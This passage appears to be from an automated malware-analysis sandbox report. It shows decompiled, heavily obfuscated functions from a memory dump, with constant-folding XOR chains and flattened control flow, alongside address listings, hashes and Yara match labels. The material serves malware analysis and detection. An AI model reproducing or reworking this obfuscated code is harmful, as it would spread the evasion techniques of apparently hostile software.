							E001D629F(_v300, _t669, _v480, _v456, _v460);
							_t825 =  &(_t825[7]);
							_t817 = 0x3d03c9c;
							goto L12;
						}
						__eflags = _t817 - 0xbf850a1;
						if(_t817 == 0xbf850a1) {
							_push(_t720);
							_push(0x10);
							_t787 = 4;
							_t677 = E001C2C02(_t787);
							_push(_v348);
							_t813 = _t677;
							_push( &_v128);
							_push(0xb);
							_push(_v404);
							E001C4A97(_t813, _v436);
							_t817 = 0x1162a32;
							goto L11;
						}
						__eflags = _t817 - 0xea2f645;
						if(_t817 != 0xea2f645) {
							goto L31;
						}
						_t817 = 0x1fa8b82;
					}
				}
			}




















































































































                          0x001d1591
                          0x001d159b
                          0x001d15a2
                          0x001d15a6
                          0x001d15b1
                          0x001d15bb
                          0x001d15bc
                          0x001d15c3
                          0x001d15c8
                          0x001d15d0
                          0x001d15d5
                          0x001d15dd
                          0x001d15e5
                          0x001d15ed
                          0x001d15f8
                          0x001d1603
                          0x001d160e
                          0x001d1619
                          0x001d1624
                          0x001d162f
                          0x001d163e
                          0x001d1640
                          0x001d1643
                          0x001d1647
                          0x001d164f
                          0x001d1654
                          0x001d165c
                          0x001d1667
                          0x001d167d
                          0x001d1684
                          0x001d168f
                          0x001d16a2
                          0x001d16a5
                          0x001d16ac
                          0x001d16b7
                          0x001d16ca
                          0x001d16d1
                          0x001d16dc
                          0x001d16f2
                          0x001d16f9
                          0x001d1701
                          0x001d170c
                          0x001d1717
                          0x001d172a
                          0x001d1731
                          0x001d173c
                          0x001d1747
                          0x001d1752
                          0x001d175d
                          0x001d1769
                          0x001d176c
                          0x001d1770
                          0x001d1775
                          0x001d177d
                          0x001d1785
                          0x001d1790
                          0x001d17a3
                          0x001d17aa
                          0x001d17b5
                          0x001d17c0
                          0x001d17cd
                          0x001d17d8
                          0x001d17e3
                          0x001d17ee
                          0x001d17f9
                          0x001d1804
                          0x001d1818
                          0x001d181d
                          0x001d1826
                          0x001d1831
                          0x001d1843
                          0x001d1848
                          0x001d1851
                          0x001d185c
                          0x001d1864
                          0x001d186c
                          0x001d1874
                          0x001d187c
                          0x001d1884
                          0x001d188c
                          0x001d1894
                          0x001d1899
                          0x001d18a1
                          0x001d18a9
                          0x001d18b4
                          0x001d18bb
                          0x001d18c6
                          0x001d18ce
                          0x001d18d3
                          0x001d18dc
                          0x001d18e1
                          0x001d18e7
                          0x001d18ef
                          0x001d18fb
                          0x001d18fe
                          0x001d1902
                          0x001d190a
                          0x001d190f
                          0x001d1917
                          0x001d191f
                          0x001d1924
                          0x001d1929
                          0x001d1931
                          0x001d1939
                          0x001d1944
                          0x001d194f
                          0x001d195a
                          0x001d1965
                          0x001d1970
                          0x001d1978
                          0x001d1980
                          0x001d198b
                          0x001d1996
                          0x001d19a1
                          0x001d19ac
                          0x001d19b4
                          0x001d19bc
                          0x001d19c4
                          0x001d19c9
                          0x001d19d1
                          0x001d19d9
                          0x001d19de
                          0x001d19e6
                          0x001d19ee
                          0x001d19f6
                          0x001d19fd
                          0x001d1a02
                          0x001d1a0a
                          0x001d1a15
                          0x001d1a1d
                          0x001d1a25
                          0x001d1a30
                          0x001d1a38
                          0x001d1a3d
                          0x001d1a45
                          0x001d1a4d
                          0x001d1a55
                          0x001d1a60
                          0x001d1a72
                          0x001d1a73
                          0x001d1a7a
                          0x001d1a85
                          0x001d1a8d
                          0x001d1a92
                          0x001d1a97
                          0x001d1a9c
                          0x001d1aa4
                          0x001d1aac
                          0x001d1ab4
                          0x001d1ac1
                          0x001d1ac5
                          0x001d1acd
                          0x001d1add
                          0x001d1ae6
                          0x001d1aea
                          0x001d1aef
                          0x001d1af7
                          0x001d1b0a
                          0x001d1b11
                          0x001d1b1c
                          0x001d1b24
                          0x001d1b2c
                          0x001d1b34
                          0x001d1b3c
                          0x001d1b44
                          0x001d1b4f
                          0x001d1b5a
                          0x001d1b65
                          0x001d1b70
                          0x001d1b78
                          0x001d1b83
                          0x001d1b8e
                          0x001d1ba2
                          0x001d1ba9
                          0x001d1bb4
                          0x001d1bbf
                          0x001d1bca
                          0x001d1bd5
                          0x001d1be0
                          0x001d1beb
                          0x001d1bf6
                          0x001d1bfe
                          0x001d1c03
                          0x001d1c0b
                          0x001d1c13
                          0x001d1c1e
                          0x001d1c29
                          0x001d1c34
                          0x001d1c3f
                          0x001d1c47
                          0x001d1c52
                          0x001d1c60
                          0x001d1c67
                          0x001d1c6d
                          0x001d1c75
                          0x001d1c7d
                          0x001d1c85
                          0x001d1c8d
                          0x001d1c95
                          0x001d1c9d
                          0x001d1ca2
                          0x001d1caa
                          0x001d1cb7
                          0x001d1cba
                          0x001d1cc4
                          0x001d1cc5
                          0x001d1ccb
                          0x001d1cd3
                          0x001d1cdb
                          0x001d1ce3
                          0x001d1ce8
                          0x001d1cf0
                          0x001d1cf4
                          0x001d1cfc
                          0x001d1d07
                          0x001d1d0f
                          0x001d1d1a
                          0x001d1d25
                          0x001d1d30
                          0x001d1d38
                          0x001d1d43
                          0x001d1d4e
                          0x001d1d56
                          0x001d1d61
                          0x001d1d6c
                          0x001d1d77
                          0x001d1d82
                          0x001d1d8d
                          0x001d1d9d
                          0x001d1da7
                          0x001d1dac
                          0x001d1db5
                          0x001d1db6
                          0x001d1dba
                          0x001d1dc2
                          0x001d1dcd
                          0x001d1dd8
                          0x001d1de3
                          0x001d1df6
                          0x001d1dfd
                          0x001d1e08
                          0x001d1e13
                          0x001d1e1b
                          0x001d1e26
                          0x001d1e31
                          0x001d1e3c
                          0x001d1e47
                          0x001d1e4f
                          0x001d1e5a
                          0x001d1e6f
                          0x001d1e81
                          0x001d1e88
                          0x001d1e8f
                          0x001d1e9a
                          0x001d1ea5
                          0x001d1eb0
                          0x001d1ebb
                          0x001d1ec3
                          0x001d1ec8
                          0x001d1ece
                          0x001d1ed1
                          0x001d1edd
                          0x001d1ee1
                          0x001d1ee6
                          0x001d1eed
                          0x001d1ef1
                          0x001d1ef9
                          0x001d1f01
                          0x001d1f06
                          0x001d1f0e
                          0x001d1f16
                          0x001d1f21
                          0x001d1f29
                          0x001d1f34
                          0x001d1f3c
                          0x001d1f41
                          0x001d1f46
                          0x001d1f4e
                          0x001d1f56
                          0x001d1f56
                          0x001d1f5a
                          0x001d1f5a
                          0x001d1f60
                          0x001d1f60
                          0x001d1f66
                          0x001d1f66
                          0x001d20d0
                          0x001d20d5
                          0x001d20d9
                          0x001d20dc
                          0x001d20e0
                          0x001d20e5
                          0x001d202d
                          0x001d202d
                          0x001d2032
                          0x001d1f5a
                          0x001d1f5a
                          0x001d1f5a
                          0x001d1f60
                          0x001d1f60
                          0x00000000
                          0x001d1f60
                          0x00000000
                          0x001d22c4
                          0x001d22c4
                          0x001d22c4
                          0x001d22d0
                          0x00000000
                          0x001d22d0
                          0x001d1f72
                          0x001d2382
                          0x00000000
                          0x001d2388
                          0x001d1f7e
                          0x001d22df
                          0x001d22e8
                          0x001d22ef
                          0x001d2335
                          0x001d235a
                          0x001d235f
                          0x001d236b
                          0x001d236d
                          0x00000000
                          0x001d236d
                          0x001d1f8a
                          0x001d203e
                          0x001d2049
                          0x001d204a
                          0x001d204e
                          0x001d2054
                          0x001d2056
                          0x001d205e
                          0x001d205f
                          0x001d2061
                          0x001d2063
                          0x001d2065
                          0x001d206e
                          0x001d206e
                          0x001d2070
                          0x001d2072
                          0x001d2074
                          0x001d2077
                          0x001d2077
                          0x001d2077
                          0x001d2088
                          0x001d2089
                          0x001d208d
                          0x001d208e
                          0x001d2093
                          0x001d2097
                          0x001d2099
                          0x001d209a
                          0x001d209c
                          0x001d20ac
                          0x001d20b1
                          0x001d2022
                          0x001d2022
                          0x001d2025
                          0x001d2025
                          0x001d2029
                          0x001d2029
                          0x00000000
                          0x001d2029
                          0x001d1f96
                          0x001d1fef
                          0x001d1ff0
                          0x001d1ff3
                          0x001d1ff8
                          0x001d1fff
                          0x001d2008
                          0x001d2009
                          0x001d200b
                          0x001d2018
                          0x001d201d
                          0x00000000
                          0x001d201d
                          0x001d1f9e
                          0x00000000
                          0x00000000
                          0x001d1faf
                          0x001d1fbd
                          0x001d1fbe
                          0x001d1fc0
                          0x001d1fc5
                          0x001d1fc9
                          0x001d1fcb
                          0x001d1fd5
                          0x001d1fda
                          0x00000000
                          0x001d20ed
                          0x001d20ed
                          0x001d20f3
                          0x001d228c
                          0x001d2299
                          0x001d229a
                          0x001d229c
                          0x001d22a1
                          0x001d22a4
                          0x001d22a8
                          0x001d22aa
                          0x001d22b6
                          0x001d22ba
                          0x001d22bf
                          0x00000000
                          0x001d22bf
                          0x001d22ac
                          0x00000000
                          0x001d22ac
                          0x001d20f9
                          0x001d20fb
                          0x001d21e0
                          0x001d21ec
                          0x001d21f3
                          0x001d21fa
                          0x001d21fe
                          0x001d225c
                          0x001d226d
                          0x001d2272
                          0x001d2275
                          0x00000000
                          0x001d2275
                          0x001d2101
                          0x001d2107
                          0x001d2172
                          0x001d217e
                          0x001d2189
                          0x001d219e
                          0x001d21a3
                          0x001d21a4
                          0x001d21a5
                          0x001d21b1
                          0x001d21ce
                          0x001d21d3
                          0x001d21d6
                          0x00000000
                          0x001d21d6
                          0x001d2109
                          0x001d210f
                          0x001d2135
                          0x001d2136
                          0x001d213a
                          0x001d213b
                          0x001d2140
                          0x001d2147
                          0x001d2150
                          0x001d2151
                          0x001d2153
                          0x001d2163
                          0x001d2168
                          0x00000000
                          0x001d2168
                          0x001d2111
                          0x001d2117
                          0x00000000
                          0x00000000
                          0x001d211d
                          0x001d211d
                          0x001d1f5a

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ^"}w$5?T$YH$^"}w$`Q$c5S1$ky$v'$9
                          • API String ID: 0-441490596
                          • Opcode ID: 178746533762834274fbaee4fc285335657efa12c668c1d7c5431d3abb2755f5
                          • Instruction ID: 143bc8cd697adef19a36363672963dba9cd12c60b1950eb9b0cc66eafc78fdb0
                          • Opcode Fuzzy Hash: 178746533762834274fbaee4fc285335657efa12c668c1d7c5431d3abb2755f5
                          • Instruction Fuzzy Hash: ED621F715083809FD378CF25C48AB8FBBE1BBD4358F108A1DE5DA96260D7B59949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D40FE, Relevance: 11.6, Strings: 9, Instructions: 319COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E001D40FE(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				void* _t331;
				void* _t375;
				signed int _t382;
				void* _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int* _t416;

				_push(_a12);
				_t407 = 0;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001C358A(_t331);
				_v1680 = 0xecc6df;
				_t416 =  &(( &_v1708)[5]);
				_t375 = 0x2bbbb5c;
				_t408 = 0x4f;
				_v1680 = _v1680 / _t408;
				_t409 = 0x69;
				_v1680 = _v1680 / _t409;
				_t410 = 0x29;
				_v1680 = _v1680 / _t410;
				_v1680 = _v1680 ^ 0x00000004;
				_v1672 = 0xf0f001;
				_v1672 = _v1672 << 5;
				_v1672 = _v1672 + 0xae5;
				_v1672 = _v1672 << 9;
				_v1672 = _v1672 ^ 0x3c166f75;
				_v1592 = 0xef70fc;
				_v1592 = _v1592 ^ 0x00e587e5;
				_v1600 = 0xc7a853;
				_v1600 = _v1600 >> 2;
				_v1600 = _v1600 ^ 0x003a93a3;
				_v1604 = 0x8b40bb;
				_v1604 = _v1604 + 0xfffff760;
				_v1604 = _v1604 ^ 0x008a5254;
				_v1700 = 0x24f303;
				_v1700 = _v1700 << 0xd;
				_v1700 = _v1700 + 0x1ce0;
				_v1700 = _v1700 ^ 0x887eb559;
				_v1700 = _v1700 ^ 0x161c5beb;
				_v1668 = 0x1c09b;
				_v1668 = _v1668 + 0xffff9686;
				_t411 = 0x5a;
				_v1668 = _v1668 * 0x4f;
				_v1668 = _v1668 | 0x6f375f79;
				_v1668 = _v1668 ^ 0x6f732305;
				_v1648 = 0x526155;
				_t68 =  &_v1648; // 0x526155
				_v1648 =  *_t68 / _t411;
				_t74 =  &_v1648; // 0x526155
				_v1648 =  *_t74 * 0x60;
				_v1648 = _v1648 ^ 0x0055ba2e;
				_v1568 = 0x4a97ea;
				_v1568 = _v1568 + 0x2d7f;
				_v1568 = _v1568 ^ 0x00446384;
				_v1624 = 0xc328b6;
				_v1624 = _v1624 >> 6;
				_v1624 = _v1624 << 6;
				_v1624 = _v1624 ^ 0x00caf265;
				_v1676 = 0x3bb87e;
				_v1676 = _v1676 + 0xffff6c80;
				_v1676 = _v1676 + 0xffff9524;
				_v1676 = _v1676 + 0xb2c3;
				_v1676 = _v1676 ^ 0x00310521;
				_v1640 = 0x4e39af;
				_v1640 = _v1640 + 0xdee0;
				_v1640 = _v1640 + 0xffffeea0;
				_v1640 = _v1640 ^ 0x0045c51b;
				_v1596 = 0x52ccd5;
				_v1596 = _v1596 + 0xffff320b;
				_v1596 = _v1596 ^ 0x005c4e46;
				_v1616 = 0xf0f3d9;
				_v1616 = _v1616 + 0xffff715e;
				_t412 = 0x3f;
				_v1616 = _v1616 * 0x30;
				_v1616 = _v1616 ^ 0x2d12086a;
				_v1660 = 0x386db;
				_v1660 = _v1660 + 0xffff8cc4;
				_v1660 = _v1660 + 0x498d;
				_v1660 = _v1660 + 0x2c05;
				_v1660 = _v1660 ^ 0x00039de5;
				_v1632 = 0xb94b21;
				_v1632 = _v1632 + 0xffff4c5b;
				_v1632 = _v1632 | 0xe8e62b69;
				_v1632 = _v1632 ^ 0xe8ff0f89;
				_v1608 = 0x9c5f73;
				_v1608 = _v1608 | 0x895c27c8;
				_v1608 = _v1608 ^ 0x89d87d16;
				_v1692 = 0xe8cb31;
				_v1692 = _v1692 * 0x48;
				_v1692 = _v1692 >> 0xb;
				_v1692 = _v1692 >> 3;
				_v1692 = _v1692 ^ 0x0006842c;
				_v1708 = 0xfe5917;
				_v1708 = _v1708 | 0xb795fffe;
				_v1708 = _v1708 + 0xffff65ed;
				_v1708 = _v1708 ^ 0xb7f6fe94;
				_v1652 = 0xd35f26;
				_v1652 = _v1652 >> 8;
				_v1652 = _v1652 + 0xffffa85d;
				_v1652 = _v1652 ^ 0x000fd654;
				_v1684 = 0x27517b;
				_v1684 = _v1684 + 0xb977;
				_v1684 = _v1684 >> 0xd;
				_v1684 = _v1684 << 7;
				_v1684 = _v1684 ^ 0x000ec1c8;
				_v1636 = 0x26e56b;
				_v1636 = _v1636 >> 4;
				_v1636 = _v1636 + 0xb334;
				_v1636 = _v1636 ^ 0x000b354a;
				_v1696 = 0x89fe17;
				_v1696 = _v1696 + 0xffffbbc1;
				_v1696 = _v1696 ^ 0x5075d2e6;
				_v1696 = _v1696 | 0x813b6067;
				_v1696 = _v1696 ^ 0xd1f21b8c;
				_v1564 = 0x14e340;
				_v1564 = _v1564 * 0x12;
				_v1564 = _v1564 ^ 0x01745609;
				_v1644 = 0x6df290;
				_v1644 = _v1644 | 0xf494ce0e;
				_v1644 = _v1644 + 0xb612;
				_v1644 = _v1644 ^ 0xf4ff3c1d;
				_v1704 = 0x9cf2ce;
				_v1704 = _v1704 + 0x46da;
				_v1704 = _v1704 + 0xffffda6c;
				_v1704 = _v1704 | 0x89d54bb7;
				_v1704 = _v1704 ^ 0x89d09b04;
				_v1588 = 0x49e131;
				_t209 =  &_v1588; // 0x49e131
				_v1588 =  *_t209 / _t412;
				_v1588 = _v1588 ^ 0x000d8a6e;
				_v1572 = 0x93642;
				_t218 =  &_v1572; // 0x93642
				_v1572 =  *_t218 * 0x39;
				_v1572 = _v1572 ^ 0x0209c809;
				_v1580 = 0x50d007;
				_v1580 = _v1580 | 0x2637a38d;
				_v1580 = _v1580 ^ 0x2675adab;
				_v1688 = 0x9d1e8f;
				_v1688 = _v1688 + 0x8b64;
				_v1688 = _v1688 << 0xb;
				_v1688 = _v1688 ^ 0xc479de2b;
				_v1688 = _v1688 ^ 0x293a1d3c;
				_v1620 = 0x2368c2;
				_v1620 = _v1620 ^ 0x12e92793;
				_v1620 = _v1620 + 0xffffecf1;
				_v1620 = _v1620 ^ 0x12cded03;
				_v1628 = 0xbb0a3e;
				_v1628 = _v1628 << 0xc;
				_v1628 = _v1628 | 0x8e0ba2db;
				_v1628 = _v1628 ^ 0xbeace13e;
				_v1576 = 0x861d4d;
				_v1576 = _v1576 + 0xffffc741;
				_v1576 = _v1576 ^ 0x008649c7;
				_v1612 = 0x27acf0;
				_v1612 = _v1612 * 0x11;
				_v1612 = _v1612 + 0x5464;
				_v1612 = _v1612 ^ 0x02ab43ea;
				_v1656 = 0xee29c8;
				_v1656 = _v1656 ^ 0x7fc9f939;
				_v1656 = _v1656 << 6;
				_v1656 = _v1656 * 0x35;
				_v1656 = _v1656 ^ 0xcf9fbfa9;
				_v1664 = 0xf6dd0c;
				_v1664 = _v1664 * 0x73;
				_v1664 = _v1664 | 0xdfbb7ddf;
				_v1664 = _v1664 ^ 0xfff795d4;
				_v1584 = 0x8afb45;
				_v1584 = _v1584 ^ 0x186a0676;
				_v1584 = _v1584 ^ 0x18ecce65;
				L1:
				while(_t375 != 0x2bbbb5c) {
					if(_t375 == 0x5f559ea) {
						_push(_v1684);
						_push(_v1652);
						_t413 = E001DCD35(0x1c1130, _v1708, __eflags);
						E001E23F2( &_v1560, __eflags);
						E001DBEAA(_v1636, __eflags,  &_v520,  &_v1560, _v1696,  &_v1040, _v1564, _v1644, _v1704, _v1588, _t407,  *0x1e5218 + 0x18, _t355, _v1572,  *0x1e5218 + 0x234);
						_push(_v1628);
						_push(_v1620);
						_push(_v1688);
						_t382 = _v1580;
						L8:
						E001D629F(_t382, _t413);
						_t416 =  &(_t416[0x10]);
						_t375 = 0xff417d9;
						continue;
					}
					if(_t375 == 0x8158fbb) {
						_push(_v1648);
						_push(_v1668);
						_t413 = E001DCD35(0x1c1020, _v1700, __eflags);
						E001E23F2( &_v1560, __eflags);
						__eflags =  *0x1e5218 + 0x234;
						E001DE35F( *0x1e5218 + 0x18,  *0x1e5218 + 0x234, _v1568, _v1624, _v1676, 0x104, _v1640,  &_v520,  &_v1560, _t365, _v1596,  *0x1e5218 + 0x234, _v1616);
						_push(_v1692);
						_push(_v1608);
						_push(_v1632);
						_t382 = _v1660;
						goto L8;
					}
					if(_t375 == 0xff417d9) {
						_push(_t375);
						__eflags = E001DEA55( &_v520, _v1576, __eflags, _v1612, _t407, _v1656, _t407, _v1664, _v1584, _t407);
						_t407 =  !=  ? 1 : _t407;
					} else {
						if(_t375 != 0x299b4b9) {
							continue;
						} else {
						}
					}
					return _t407;
				}
				E001CB3B4(_v1672, _t375, _v1592, _t375, _v1600,  &_v1040, _v1604, _v1680);
				_t416 =  &(_t416[7]);
				_t375 = 0x8158fbb;
				goto L1;
			}





















































                          0x001d4108
                          0x001d410f
                          0x001d4111
                          0x001d4118
                          0x001d411f
                          0x001d4120
                          0x001d4121
                          0x001d4126
                          0x001d412e
                          0x001d4137
                          0x001d413e
                          0x001d4143
                          0x001d414d
                          0x001d4152
                          0x001d415c
                          0x001d4161
                          0x001d4167
                          0x001d416c
                          0x001d4174
                          0x001d4179
                          0x001d4181
                          0x001d4186
                          0x001d418e
                          0x001d41a7
                          0x001d41b2
                          0x001d41bd
                          0x001d41c5
                          0x001d41d0
                          0x001d41d8
                          0x001d41e0
                          0x001d41e8
                          0x001d41f0
                          0x001d41f5
                          0x001d41fd
                          0x001d4205
                          0x001d420d
                          0x001d4215
                          0x001d4222
                          0x001d4223
                          0x001d4227
                          0x001d422f
                          0x001d4237
                          0x001d423f
                          0x001d4245
                          0x001d4249
                          0x001d424e
                          0x001d4252
                          0x001d425a
                          0x001d4265
                          0x001d4270
                          0x001d427b
                          0x001d4283
                          0x001d4288
                          0x001d428d
                          0x001d4295
                          0x001d429d
                          0x001d42a5
                          0x001d42ad
                          0x001d42b5
                          0x001d42bd
                          0x001d42c7
                          0x001d42cf
                          0x001d42d7
                          0x001d42df
                          0x001d42ea
                          0x001d42f5
                          0x001d4300
                          0x001d4308
                          0x001d4317
                          0x001d4318
                          0x001d431c
                          0x001d4324
                          0x001d432c
                          0x001d4334
                          0x001d433c
                          0x001d4344
                          0x001d434c
                          0x001d4354
                          0x001d435c
                          0x001d4364
                          0x001d436c
                          0x001d4374
                          0x001d437c
                          0x001d4384
                          0x001d4391
                          0x001d4395
                          0x001d439a
                          0x001d439f
                          0x001d43a7
                          0x001d43af
                          0x001d43b7
                          0x001d43bf
                          0x001d43c7
                          0x001d43cf
                          0x001d43d4
                          0x001d43dc
                          0x001d43e4
                          0x001d43ec
                          0x001d43f4
                          0x001d43f9
                          0x001d43fe
                          0x001d4406
                          0x001d440e
                          0x001d4413
                          0x001d441b
                          0x001d4423
                          0x001d442b
                          0x001d4433
                          0x001d443b
                          0x001d4443
                          0x001d444b
                          0x001d445e
                          0x001d4465
                          0x001d4470
                          0x001d4478
                          0x001d4480
                          0x001d4488
                          0x001d4490
                          0x001d4498
                          0x001d44a0
                          0x001d44a8
                          0x001d44b0
                          0x001d44b8
                          0x001d44c3
                          0x001d44cc
                          0x001d44d3
                          0x001d44de
                          0x001d44e9
                          0x001d44f1
                          0x001d44f8
                          0x001d4503
                          0x001d450e
                          0x001d4519
                          0x001d4524
                          0x001d452c
                          0x001d4539
                          0x001d4543
                          0x001d454b
                          0x001d4553
                          0x001d455b
                          0x001d4563
                          0x001d456b
                          0x001d4573
                          0x001d457b
                          0x001d4580
                          0x001d4588
                          0x001d4590
                          0x001d459b
                          0x001d45a6
                          0x001d45b1
                          0x001d45be
                          0x001d45c2
                          0x001d45ca
                          0x001d45d2
                          0x001d45da
                          0x001d45e2
                          0x001d45ec
                          0x001d45f0
                          0x001d45f8
                          0x001d4605
                          0x001d4609
                          0x001d4611
                          0x001d4619
                          0x001d4624
                          0x001d462f
                          0x00000000
                          0x001d463a
                          0x001d464c
                          0x001d4710
                          0x001d4719
                          0x001d472f
                          0x001d4731
                          0x001d478c
                          0x001d4791
                          0x001d4798
                          0x001d479f
                          0x001d47a3
                          0x001d46ff
                          0x001d4701
                          0x001d4706
                          0x001d4709
                          0x00000000
                          0x001d4709
                          0x001d4654
                          0x001d466b
                          0x001d4674
                          0x001d4688
                          0x001d468a
                          0x001d469f
                          0x001d46e1
                          0x001d46e6
                          0x001d46ea
                          0x001d46f1
                          0x001d46f8
                          0x00000000
                          0x001d46f8
                          0x001d4658
                          0x001d47e2
                          0x001d4815
                          0x001d4817
                          0x001d465e
                          0x001d4664
                          0x00000000
                          0x00000000
                          0x001d4666
                          0x001d4664
                          0x001d4826
                          0x001d4826
                          0x001d47d3
                          0x001d47d8
                          0x001d47db
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1I$B6$FN\$UaR$dT$i+$k&$y_7o${Q'
                          • API String ID: 0-1837524644
                          • Opcode ID: 3cd3be6259ba92f6c734b84d95f72fd95f72311a8a2898f8bcc649a7fbbd5a55
                          • Instruction ID: 2fb45e38f04d8bc1a8e2d7899549fc3ccb67dcfa52c3aec386b6851bd958f53f
                          • Opcode Fuzzy Hash: 3cd3be6259ba92f6c734b84d95f72fd95f72311a8a2898f8bcc649a7fbbd5a55
                          • Instruction Fuzzy Hash: 4B0202714083819FD7A4CF61C88AA9BBBE1FBD5718F108A1DF2DA86261D7B18549CF03
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D4CF5, Relevance: 11.5, Strings: 9, Instructions: 287COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E001D4CF5(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v12;
				char _v16;
				char _v36;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v88;
				signed int _v92;
				char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				void* _t259;
				void* _t288;
				void* _t290;
				signed int _t292;
				char* _t294;
				signed int _t295;
				signed int _t297;
				intOrPtr _t305;
				intOrPtr* _t308;
				void* _t310;
				signed int _t311;
				intOrPtr _t314;
				intOrPtr _t348;
				intOrPtr* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int* _t362;

				_t350 = _a12;
				_t308 = __ecx;
				_push(_t350);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C358A(_t259);
				_v80 = 0xd3edc3;
				_t362 =  &(( &_v184)[5]);
				_v76 = 0x5e605a;
				_t348 = 0;
				_v72 = 0x201dcb;
				_v68 = 0;
				_t310 = 0x8aa177e;
				_v148 = 0xb76f6d;
				_v148 = _v148 >> 0x10;
				_v148 = _v148 + 0x18ab;
				_t351 = 0x1e;
				_v148 = _v148 / _t351;
				_v148 = _v148 ^ 0x000000d8;
				_v116 = 0x6b0077;
				_t352 = 0x43;
				_v116 = _v116 / _t352;
				_t353 = 0x1b;
				_v116 = _v116 / _t353;
				_v116 = _v116 ^ 0x00000f34;
				_v156 = 0x38872e;
				_v156 = _v156 + 0xffff918e;
				_t354 = 0x3b;
				_v156 = _v156 / _t354;
				_v156 = _v156 + 0xffff85b1;
				_v156 = _v156 ^ 0x000d6d44;
				_v172 = 0x452f09;
				_v172 = _v172 + 0x4173;
				_v172 = _v172 + 0x5770;
				_v172 = _v172 | 0x316460a7;
				_v172 = _v172 ^ 0x316bcae2;
				_v108 = 0x3bea79;
				_v108 = _v108 | 0x81cfa252;
				_v108 = _v108 ^ 0x81fbf3ab;
				_v124 = 0xa928d9;
				_v124 = _v124 << 6;
				_v124 = _v124 | 0x6a232946;
				_v124 = _v124 ^ 0x6a67a584;
				_v140 = 0x984825;
				_v140 = _v140 ^ 0x456e5524;
				_v140 = _v140 >> 0xe;
				_v140 = _v140 ^ 0x00012cd5;
				_v112 = 0x5ddb92;
				_v112 = _v112 + 0xffff4224;
				_v112 = _v112 + 0x8c78;
				_v112 = _v112 ^ 0x00508e10;
				_v180 = 0x117291;
				_v180 = _v180 + 0xffffe0b6;
				_t355 = 0x1e;
				_v180 = _v180 * 0x22;
				_v180 = _v180 / _t355;
				_v180 = _v180 ^ 0x0010096b;
				_v128 = 0x2232b8;
				_v128 = _v128 | 0x861d190a;
				_t356 = 0x1b;
				_v128 = _v128 / _t356;
				_v128 = _v128 ^ 0x04f1c2b9;
				_v184 = 0x193996;
				_t357 = 0x5b;
				_v184 = _v184 * 0x73;
				_v184 = _v184 + 0xffffa085;
				_v184 = _v184 | 0x88b629a7;
				_v184 = _v184 ^ 0x8bff06e0;
				_v164 = 0x969355;
				_v164 = _v164 >> 0xb;
				_v164 = _v164 * 0x1f;
				_v164 = _v164 + 0xffff37be;
				_v164 = _v164 ^ 0x0000e5b0;
				_v132 = 0x3ff47d;
				_v132 = _v132 >> 0x10;
				_v132 = _v132 + 0xffff6f11;
				_v132 = _v132 ^ 0xfff834b1;
				_v160 = 0x3ec58e;
				_v160 = _v160 | 0x66c27e62;
				_v160 = _v160 * 0x31;
				_v160 = _v160 + 0xffff85ff;
				_v160 = _v160 ^ 0xb6c79e62;
				_v104 = 0xeb81be;
				_v104 = _v104 / _t357;
				_v104 = _v104 ^ 0x00072f15;
				_v168 = 0xb75583;
				_v168 = _v168 + 0x12dd;
				_t358 = 0x36;
				_v168 = _v168 / _t358;
				_t359 = 0x13;
				_v168 = _v168 / _t359;
				_v168 = _v168 ^ 0x00071b18;
				_v176 = 0xdeab00;
				_v176 = _v176 * 0x16;
				_v176 = _v176 * 0x1e;
				_v176 = _v176 << 7;
				_v176 = _v176 ^ 0x086543d8;
				_v136 = 0x6f9847;
				_v136 = _v136 ^ 0xbf126c38;
				_v136 = _v136 + 0xffff2dd4;
				_v136 = _v136 ^ 0xbf77b4f6;
				_v120 = 0x2e3775;
				_v120 = _v120 << 0x10;
				_v120 = _v120 >> 8;
				_v120 = _v120 ^ 0x00362632;
				_v152 = 0x484ea5;
				_v152 = _v152 + 0xffff4c40;
				_v152 = _v152 + 0xffff3acc;
				_v152 = _v152 << 0xd;
				_v152 = _v152 ^ 0xdab37ebc;
				_v100 = 0x9800f0;
				_v100 = _v100 >> 4;
